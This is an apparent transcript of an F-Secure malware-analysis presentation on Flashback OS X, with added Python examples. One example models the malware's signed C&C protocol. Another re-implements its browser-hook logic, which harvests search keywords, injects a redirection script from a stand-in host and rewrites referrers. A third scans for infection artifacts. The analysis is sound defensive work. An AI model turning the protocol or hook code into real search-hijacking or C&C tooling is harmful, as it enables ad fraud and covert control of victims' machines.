Flashback OS X Malware, Broderick Ian Aquilino, September 27, 2012 (PowerPoint presentation)



SLIDE 1

Protecting the irreplaceable | f-secure.com

Flashback OS X Malware

Broderick Ian Aquilino – September 27, 2012

SLIDE 2

Agenda

  • Infection Vector
  • Installation
  • Main Binary
  • C&C Servers
  • Payload
  • Remaining Binaries
  • Filter/Loader Binary
  • LaunchAgent Binary

September 27, 2012 2

SLIDE 3

Infection Summary


Infection chain: Hacked Website -> Distribution Website -> Installer -> Main Binary -> Filter / Loader -> Launch Agent

SLIDE 4

Infection Vector

SLIDE 5

Infection Vector

SLIDE 6

Infection Vector

SLIDE 7

Infection Vector

SLIDE 8

Infection Vector

Java vulnerabilities exploited:

  • CVE-2008-5353
  • CVE-2011-3544
  • CVE-2012-0507

SLIDE 9

Installation

SLIDE 10

Main Binary

SLIDE 11

Main Binary: Update Server

  • Creates a thread that connects to a set of C&C servers to download updates every 3670 seconds (just over an hour)


Sources of the update C&C server list:

  • Hardcoded list
  • Returned by a third-party server
  • Generated list based on date (new variants only)

SLIDE 12

Main Binary: Update Program

  • Response format:
    %marker1%%encoded_VM_program%%marker2%%encoded_MD5_RSA_signature%%marker3%
  • Logs the SHA1 of the VM program to:
    {HOME}/Library/Logs/swlog
    {HOME}/Library/Logs/vmLog

SLIDE 13

Main Binary: Payload C&C (Newer Variants)

  • The same thread also connects to another set of C&C servers, this time to select a server for executing the payload

Sources of the payload C&C server list:

  • Updateable list (Entry ID 3035856777)
  • Hardcoded list (Entry ID 2522550406)
  • Generated list based on date

SLIDE 14

Main Binary: Payload C&C (Old Variants)

  • Selected only once - when binary is loaded

Source of the payload C&C server list:

  • Hardcoded list (Entry ID 2413278617)

SLIDE 15

Main Binary: Payload C&C Validation

  • Response format:
    %SHA1_string_of_server_name% | %MD5_RSA_signature%
  • Default server: the 2nd host (old variants) or the 1st host (new variants) in the hardcoded list
  • Uses "localhost" if the configuration entry does not exist (new variants only)

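As an added example (not code from the slides or from F-Secure), the following Python models the two signed C&C responses that slides 12 and 15 describe: the marker-framed update program with its MD5-RSA signature, and the payload server's SHA1-plus-signature validation with the default-server fallback. The marker strings, the base64/hex encodings, the toy RSA key and the reading of "MD5_RSA_signature" as a textbook RSA signature over the MD5 digest are all assumptions; the slides give the formats, not the constants.

```python
import base64
import hashlib

# Constructed toy RSA key. Two Mersenne primes give a 196-bit modulus, large
# enough to hold a 128-bit MD5 digest. The malware's real key is not on the
# slides; a real deployment would use a properly generated key.
P, Q = 2**89 - 1, 2**107 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
SIG_LEN = (N.bit_length() + 7) // 8


def md5_rsa_sign(data: bytes) -> bytes:
    """'MD5_RSA_signature' taken to mean textbook RSA over the MD5 digest (assumption)."""
    m = int.from_bytes(hashlib.md5(data).digest(), "big")
    return pow(m, D, N).to_bytes(SIG_LEN, "big")


def md5_rsa_verify(data: bytes, sig: bytes) -> bool:
    """Recover the digest with the public exponent and compare it to MD5(data)."""
    if len(sig) != SIG_LEN:
        return False
    s = int.from_bytes(sig, "big")
    if s >= N:
        return False
    return pow(s, E, N) == int.from_bytes(hashlib.md5(data).digest(), "big")


# Slide 12: %marker1%%encoded_VM_program%%marker2%%encoded_MD5_RSA_signature%%marker3%
# Marker values and base64 encoding are assumptions.
MARKER1, MARKER2, MARKER3 = b"<<m1>>", b"<<m2>>", b"<<m3>>"


def build_update_response(program: bytes) -> bytes:
    """What a server holding the private key would send."""
    return (MARKER1 + base64.b64encode(program) + MARKER2
            + base64.b64encode(md5_rsa_sign(program)) + MARKER3)


def parse_update_response(resp: bytes):
    """Return (program, sha1_hex) when framing and signature check out, else None.
    sha1_hex is the value the slides say is logged to {HOME}/Library/Logs/swlog and vmLog."""
    if not (resp.startswith(MARKER1) and resp.endswith(MARKER3)):
        return None
    body = resp[len(MARKER1):len(resp) - len(MARKER3)]
    try:
        prog_b64, sig_b64 = body.split(MARKER2, 1)
        program = base64.b64decode(prog_b64, validate=True)
        sig = base64.b64decode(sig_b64, validate=True)
    except ValueError:          # missing marker2 or malformed base64
        return None
    if not md5_rsa_verify(program, sig):
        return None
    return program, hashlib.sha1(program).hexdigest()


# Slide 15: %SHA1_string_of_server_name% | %MD5_RSA_signature%
# The signature is assumed to cover the SHA1 hex string and to be hex encoded.
def build_server_response(server: str) -> bytes:
    digest = hashlib.sha1(server.encode()).hexdigest().encode()
    return digest + b" | " + md5_rsa_sign(digest).hex().encode()


def validate_server_response(server: str, resp: bytes) -> bool:
    """The server proves possession of the private key over a value bound to its own name."""
    try:
        digest, sig_hex = resp.split(b" | ", 1)
        sig = bytes.fromhex(sig_hex.decode())
    except ValueError:
        return False
    if digest != hashlib.sha1(server.encode()).hexdigest().encode():
        return False
    return md5_rsa_verify(digest, sig)


def select_payload_server(candidates, responses, hardcoded, new_variant=True, config_present=True):
    """Pick the first candidate whose response validates; otherwise fall back as slide 15 states."""
    for host in candidates:
        resp = responses.get(host)
        if resp is not None and validate_server_response(host, resp):
            return host
    if new_variant and not config_present:
        return "localhost"
    return hardcoded[0] if new_variant else hardcoded[1]
```

Because only the holder of the private key can produce either signature, a host that answers the update or server-selection request without it fails both checks and the binary drops back to its defaults; the signature is what protects the operators' channel against takeover, not the victim.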
SLIDE 16

Main Binary: Payload (Old Variants)


Hooked functions:

  • Outbound: CFWriteStreamWrite, send
  • Inbound: CFReadStreamRead, recv

SLIDE 17

Main Binary: Payload (Old Variants)


  • Outbound: is the request going to Google? If so, alter it so that the reply comes back in a format that is parseable
  • Inbound: does the response contain the target string? If so, inject content

SLIDE 18

Demo

SLIDE 19

Main Binary: Payload (Newer Variants)

(Diagram: Browser; hooked CFWriteStreamWrite / CFReadStreamRead; Other Modules; Command and Control; Google; Destination)

SLIDE 20

Main Binary: Payload (Newer) -> Search

(Diagram as on slide 19, labelled: Keyword and other info, sent from the hooks to Command and Control)

SLIDE 21

Main Binary: Payload (Newer) -> Search

(Diagram as on slide 19, labelled: Redirection data and/or other commands; Original search request; Google search result)

SLIDE 22

Main Binary: Payload (Newer) -> Click

(Diagram as on slide 19, labelled: Tracking info; Redirection info; Redirection info)

SLIDE 23

Main Binary: Payload (Newer) -> Click

  • Google returns the request in the response

SLIDE 24

Main Binary: Payload (Newer) -> Click

(Diagram as on slide 19, labelled: Redirection script; Request to new destination)

SLIDE 25

Main Binary: Payload (Newer) -> Click

(Diagram as on slide 19, labelled: Request with modified referrer)

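An added example, not the malware's code: the decision logic of the stream hooks from slides 16 and 17 and the search/click flow of slides 19 to 25, reduced to Python over constructed HTTP buffers. The real hooks are native code placed over CFWriteStreamWrite/send and CFReadStreamRead/recv inside the browser process; here an outbound buffer is classified (a Google search with its keyword, a click on a result with its destination, or pass-through), an inbound buffer holding the target string gets content injected, and a request has its referrer rewritten as on slide 25. The host name, the URL paths, the target string and the injected script are assumptions, and the exact request alteration of slide 17 is not on the slides and is not modelled.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed constants: the slides name Google as the target but not the exact
# host, paths, target string or injected script. All four are assumptions.
TARGET_HOST = "www.google.com"
INJECT_MARKER = b"</head>"   # the "target string" looked for in inbound data
INJECTED = b"<script src=\"http://redirect.example/r.js\"></script>"  # hypothetical redirection script


def parse_http_request(buf: bytes):
    """Return (method, path, headers) for an HTTP/1.x request, or None for anything else.
    The hook sits below the browser, so TLS records and other protocols cross it too."""
    head, _, _ = buf.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return parts[0].decode("latin-1"), parts[1].decode("latin-1"), headers


def outbound_hook(buf: bytes) -> dict:
    """Model of the CFWriteStreamWrite/send hook: decide what the browser is sending.
    A search yields the keyword that slide 20 shows going to Command and Control;
    a click on a result yields its destination (slides 22 to 24)."""
    req = parse_http_request(buf)
    if req is None:
        return {"kind": "passthrough"}
    _, path, headers = req
    if headers.get("host") != TARGET_HOST:
        return {"kind": "passthrough"}
    url = urlsplit(path)
    query = parse_qs(url.query)
    if url.path == "/search" and "q" in query:
        return {"kind": "search", "keyword": query["q"][0]}
    if url.path == "/url" and "url" in query:          # assumed click-through path
        return {"kind": "click", "destination": query["url"][0]}
    return {"kind": "google_other"}


def inbound_hook(buf: bytes, redirection: bytes = INJECTED) -> bytes:
    """Model of the CFReadStreamRead/recv hook: when the target string is present,
    inject content (slide 17), here the redirection script of slide 24."""
    if INJECT_MARKER in buf:
        return buf.replace(INJECT_MARKER, redirection + INJECT_MARKER, 1)
    return buf


def rewrite_referer(buf: bytes, new_referer: str) -> bytes:
    """Slide 25: the request to the new destination leaves with a modified referrer."""
    if parse_http_request(buf) is None:
        return buf
    head, sep, body = buf.partition(b"\r\n\r\n")
    lines = [l for l in head.split(b"\r\n") if not l.lower().startswith(b"referer:")]
    lines.append(b"Referer: " + new_referer.encode("latin-1"))
    return b"\r\n".join(lines) + sep + body
```

Seen from the network, none of this is visible as malware traffic: the search request still reaches Google and the result page still comes back; only what the browser hands to the socket, and what it gets from it, has been altered in between.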
SLIDE 26

Demo

SLIDE 27

Filter/Loader Binary

SLIDE 28

Filter/Loader Binary

SLIDE 29

Filter/Loader Binary

SLIDE 30

LaunchAgent Binary

SLIDE 31

LaunchAgent Binary

  • Stand-alone light version of the updater module found in the main binary
  • Uses a different set of C&C servers
  • Similar server validation process
  • Logs the CRC32 of the update/installation program to:
    /tmp/.%crc32_of_VM_program%
  • Has its own instruction set

Sources of the LaunchAgent C&C server list:

  • Generated list based on constants
  • Generated list based on date
  • Hardcoded list

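An added example (not from the slides) that turns the on-disk artifacts named on slides 12 and 31 into a scan a responder can run over a mounted home directory and tmp directory: the two updater logs under {HOME}/Library/Logs and the hidden /tmp/.%crc32_of_VM_program% log of the LaunchAgent. The assumption that the CRC32 is written as eight lowercase hex digits, the sample program bytes and the directory tree built by demo() are constructed; the LaunchAgent plist location is not on the slides and is not guessed here.

```python
import re
import zlib
from pathlib import Path

# Paths taken from the slides; the home and tmp roots are parameters so the
# scan can run against a mounted image or a test tree instead of the live host.
UPDATER_LOGS = ("Library/Logs/swlog", "Library/Logs/vmLog")   # slide 12: SHA1 of the VM program
CRC32_LOG_RE = re.compile(r"^\.[0-9a-fA-F]{8}$")                # slide 31: /tmp/.%crc32_of_VM_program%


def crc32_log_name(vm_program: bytes) -> str:
    """File name the LaunchAgent would use, assuming CRC32 rendered as 8 lowercase hex digits."""
    return ".%08x" % (zlib.crc32(vm_program) & 0xFFFFFFFF)


def scan_artifacts(home: str, tmp: str, known_programs=()) -> list:
    """Return sorted (kind, path) findings. Hidden 8-hex-digit files in tmp are reported
    as candidates; when the bytes of a known sample are supplied, a file whose name
    equals that sample's CRC32 is reported as a confirmed match."""
    findings = []
    for rel in UPDATER_LOGS:
        p = Path(home) / rel
        if p.is_file():
            findings.append(("updater-log", str(p)))
    expected = {crc32_log_name(b) for b in known_programs}
    tmp_path = Path(tmp)
    if tmp_path.is_dir():
        for entry in tmp_path.iterdir():
            if entry.is_file() and CRC32_LOG_RE.match(entry.name):
                kind = "launchagent-log-known-sample" if entry.name in expected else "launchagent-log-candidate"
                findings.append((kind, str(entry)))
    return sorted(findings)


def demo() -> list:
    """Constructed sample tree (not real evidence) so the scan runs offline."""
    import tempfile
    root = Path(tempfile.mkdtemp())
    home, tmp = root / "home", root / "tmp"
    (home / "Library" / "Logs").mkdir(parents=True)
    tmp.mkdir()
    (home / "Library" / "Logs" / "swlog").write_text("da39a3ee5e6b4b0d3255bfef95601890afd80709\n")
    sample = b"constructed VM program bytes"
    (tmp / crc32_log_name(sample)).write_bytes(b"")   # matches the known sample
    (tmp / ".a1b2").write_bytes(b"")                   # too short: not a CRC32 name
    (tmp / ".cafebabe").write_bytes(b"")               # right shape, no known sample
    return scan_artifacts(str(home), str(tmp), [sample])


if __name__ == "__main__":
    for kind, path in demo():
        print(kind, path)
```

A hit on a candidate name alone is weak evidence, since any program may leave a hidden eight-hex-digit file in /tmp; the updater logs and a CRC32 that matches a sample you already hold are the findings worth acting on.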
SLIDE 32

LaunchAgent Binary - Recent Variant

SLIDE 33

LaunchAgent Binary - Recent Variant

  • Has taken over the responsibility of installing the malware

SLIDE 34

Thank you! Please check out the conference paper for more details.

broderick.aquilino@f-secure.com